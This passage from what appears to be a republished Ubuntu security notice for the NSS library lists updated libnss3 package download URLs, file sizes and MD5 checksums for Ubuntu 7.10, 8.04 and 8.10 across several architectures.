      Size/MD5:   240514 9cfb4b3bace2f033b7c55ba571d0c4a1
    http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-tools_3.11.5-3ubuntu0.7.10.2_powerpc.deb
      Size/MD5:   645362 ccd118c24941759b0c2e758ae60b4ba5

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-0d-dbg_3.11.5-3ubuntu0.7.10.2_sparc.deb
      Size/MD5:  2834042 f884524281d9521e07b60c8bf9aa8074
    http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-0d_3.11.5-3ubuntu0.7.10.2_sparc.deb
      Size/MD5:   718096 906896f0101a88bd6cb78ffdb103fe0e
    http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-dev_3.11.5-3ubuntu0.7.10.2_sparc.deb
      Size/MD5:   235222 f679c8d076c15860a41c1e16b1d69ded
    http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-tools_3.11.5-3ubuntu0.7.10.2_sparc.deb
      Size/MD5:   576390 75811d5dc9ddd1eca108bc50ffe3e911

Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.0.3-0ubuntu0.8.04.5.diff.gz
      Size/MD5:    38918 6fda80e067b0f84e323b3556b5f9dd18
    http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.0.3-0ubuntu0.8.04.5.dsc
      Size/MD5:     2001 e9365c71192c0e568d5dd9891708e436
    http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.0.3.orig.tar.gz
      Size/MD5:  5161407 9e96418400e073f982e83c235718c4e9

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-0d_3.12.0.3-0ubuntu0.8.04.5_amd64.deb
      Size/MD5:    17910 7933180f37ce55969719730463fef4cb
    http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d-dbg_3.12.0.3-0ubuntu0.8.04.5_amd64.deb
      Size/MD5:  4511304 1a241985ee6673075b8610bbb2be2902
    http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d_3.12.0.3-0ubuntu0.8.04.5_amd64.deb
      Size/MD5:  1135226 fcc9b7555aac5a0ef0260aa639b7421a
    http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-dev_3.12.0.3-0ubuntu0.8.04.5_amd64.deb
      Size/MD5:   256738 992898a7cce94822e29a3e0d5d318e46
    http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-tools_3.12.0.3-0ubuntu0.8.04.5_amd64.deb
      Size/MD5:   813730 542b82a7837b4a43191fd5862a97699e

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-0d_3.12.0.3-0ubuntu0.8.04.5_i386.deb
      Size/MD5:    17894 3ea3554784b1242ce89f96bb631d0c4d
    http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d-dbg_3.12.0.3-0ubuntu0.8.04.5_i386.deb
      Size/MD5:  4294520 d7eb7d334bd821d887e24d76d8e2804f
    http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d_3.12.0.3-0ubuntu0.8.04.5_i386.deb
      Size/MD5:  1017710 7afd17b32bc5ce80babf2405488997e8
    http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-dev_3.12.0.3-0ubuntu0.8.04.5_i386.deb
      Size/MD5:   253724 f7f8ad3723f384a657907016b8476c35
    http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-tools_3.12.0.3-0ubuntu0.8.04.5_i386.deb
      Size/MD5:   741278 ed53c68732f059a90a35310b68c4be88

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/n/nss/libnss3-0d_3.12.0.3-0ubuntu0.8.04.5_lpia.deb
      Size/MD5:    17874 5e1a506010c923ba8a41129fef693344
    http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.0.3-0ubuntu0.8.04.5_lpia.deb
      Size/MD5:  4322188 cd5765f42aaffa32e20b0ac0510d9b6c
    http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.0.3-0ubuntu0.8.04.5_lpia.deb
      Size/MD5:   993934 313d088bd4a0a44fe05b762e33ef927d
    http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.0.3-0ubuntu0.8.04.5_lpia.deb
      Size/MD5:   252500 dcaf82868eaa0e3162a6a49fb6f512be
    http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.12.0.3-0ubuntu0.8.04.5_lpia.deb
      Size/MD5:   719648 8e422c9ee3dd5a062f547d36d6e2725c

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/n/nss/libnss3-0d_3.12.0.3-0ubuntu0.8.04.5_powerpc.deb
      Size/MD5:    20352 144b270c8fc23407e1da27112151c952
    http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.0.3-0ubuntu0.8.04.5_powerpc.deb
      Size/MD5:  4440132 f89a7f34a199abd8e0d840bb011ca5bf
    http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.0.3-0ubuntu0.8.04.5_powerpc.deb
      Size/MD5:  1115852 d88c0295406e468f7ac1c087edb661dd
    http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.0.3-0ubuntu0.8.04.5_powerpc.deb
      Size/MD5:   255446 4eef63577fbaa5b611b0d9064c47ac6c
    http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.12.0.3-0ubuntu0.8.04.5_powerpc.deb
      Size/MD5:   777064 83ad19b301d2c1eceef6682cbad5a00d

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/n/nss/libnss3-0d_3.12.0.3-0ubuntu0.8.04.5_sparc.deb
      Size/MD5:    17976 c763ceebcc3bf6371477809a8589cebf
    http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.0.3-0ubuntu0.8.04.5_sparc.deb
      Size/MD5:  4038136 bbb4ff75f73844f33727fada2ca730b4
    http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.0.3-0ubuntu0.8.04.5_sparc.deb
      Size/MD5:   995598 2785d368bbb6665eee586ac3fc3e453e
    http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.0.3-0ubuntu0.8.04.5_sparc.deb
      Size/MD5:   250450 a972e1131466d149480a574a57537c37
    http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.12.0.3-0ubuntu0.8.04.5_sparc.deb
      Size/MD5:   702432 d16a1353ba80d7104820f97c4f712334

Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.0.3-0ubuntu5.8.10.1.diff.gz
      Size/MD5:    38881 8be9f8eb187a657a743e115f58dbb58b
    http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.0.3-0ubuntu5.8.10.1.dsc
      Size/MD5:     2001 88381f73650cd5c2c369f387638ec40d
    http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.0.3.orig.tar.gz
      Size/MD5:  5161407 9e96418400e073f982e83c235718c4e9

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d-dbg_3.12.0.3-0ubuntu5.8.10.1_amd64.deb
      Size/MD5:  4696732 5e2844909ee8896f71548c37f7ab711f
    http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d_3.12.0.3-0ubuntu5.8.10.1_amd64.deb
      Size/MD5:  1182642 6f73554c7970e2c0e3da7dcddf8d4d7f
    http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-dev_3.12.0.3-0ubuntu5.8.10.1_amd64.deb
      Size/MD5:   256520 808f5ff374081b1fd7f981699e267828
    http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-0d_3.12.0.3-0ubuntu5.8.10.1_amd64.deb
      Size/MD5:    17962 63411a0d50d9fa340f688c7a5cec33ae
    http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-tools_3.12.0.3-0ubuntu5.8.10.1_amd64.deb
      Size/MD5:   824382 367bbe2bf29f17c4fa5b085142e0bc8f

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d-dbg_3.12.0.3-0ubuntu5.8.10.1_i386.deb
      Size/MD5:  4450042 bb8560c5208a6f4d2a121a93d7ff7bac
    http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d_3.12.0.3-0ubuntu5.8.10.1_i386.deb
      Size/MD5:  1054914 1f7cbdc5e0776b8c2fc92241776bd96e
    http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-dev_3.12.0.3-0ubuntu5.8.10.1_i386.deb
      Size/MD5:   253554 c1cc8fff73ef7b34dadc6fea411bc7db
    http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-0d_3.12.0.3-0ubuntu5.8.10.1_i386.deb
      Size/MD5:    17940 b3577f334ed9f5a95c6fdbdd4de83ef4
    http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-tools_3.12.0.3-0ubuntu5.8.10.1_i386.deb
      Size/MD5:   752462 703f7bd356efc312f216e361209ef3a7

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.0.3-0ubuntu5.8.10.1_lpia.deb
      Size/MD5:  4482980 c27f13a5f5aba10c93b2dda917c1ba31
    http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.0.3-0ubuntu5.8.10.1_lpia.deb
      Size/MD5:  1029092 3b2805f79d61b595907187846da18a54
    http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.0.3-0ubuntu5.8.10.1_lpia.deb
      Size/MD5:   252140 06b18884a6e275a5fc9a73abd1464875
    http://ports.ubuntu.com/pool/universe/n/nss/libnss3-0d_3.12.0.3-0ubuntu5.8.10.1_lpia.deb
      Size/MD5:    17914 28d1eeaac6ba2f9c17da9a9a6ea35fdd
    http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.12.0.3-0ubuntu5.8.10.1_lpia.deb
      Size/MD5:   730786 e1497e0cbdf8d7c3ac4c6e80e86837bf

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.0.3-0ubuntu5.8.10.1_powerpc.deb
      Size/MD5:  4659468 ceb162226c93c950c71d2f0236b9d53e
    http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.0.3-0ubuntu5.8.10.1_powerpc.deb
      Size/MD5:  1137358 f61287d145339ece156686d86a971480
    http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.0.3-0ubuntu5.8.10.1_powerpc.deb
      Size/MD5:   255312 d7787174c0d6b25467b0f1262306be06
    http://ports.ubuntu.com/pool/universe/n/nss/libnss3-0d_3.12.0.3-0ubuntu5.8.10.1_powerpc.deb
      Size/MD5:    20352 082622bc3e21161a1085695bd4f8f961
    http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.12.0.3-0ubuntu5.8.10.1_powerpc.deb
      Size/MD5:   775316 78ca70e113bd97d42f62e19e0ac8fdb1

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.0.3-0ubuntu5.8.10.1_sparc.deb
      Size/MD5:  4168250 b9f3c0b8eab76476c9bb057b43d9df40
    http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.0.3-0ubuntu5.8.10.1_sparc.deb
      Size/MD5:  1015340 5dd83c288df733b6a84247b48d945647
    http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.0.3-0ubuntu5.8.10.1_sparc.deb
      Size/MD5:   250138 f6a1dd454cc44a4684ab288e9eadde56
    http://ports.ubuntu.com/pool/universe/n/nss/libnss3-0d_3.12.0.3-0ubuntu5.8.10.1_sparc.deb
      Size/MD5:    18068 27f0453909db6eda6d8ffd3ef35454c9
    http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.12.0.3-0ubuntu5.8.10.1_sparc.deb
      Size/MD5:   703524 e87fca0b128626aebf5bce77473ee8e0





© 1998-2024 E-Soft Inc. All rights reserved.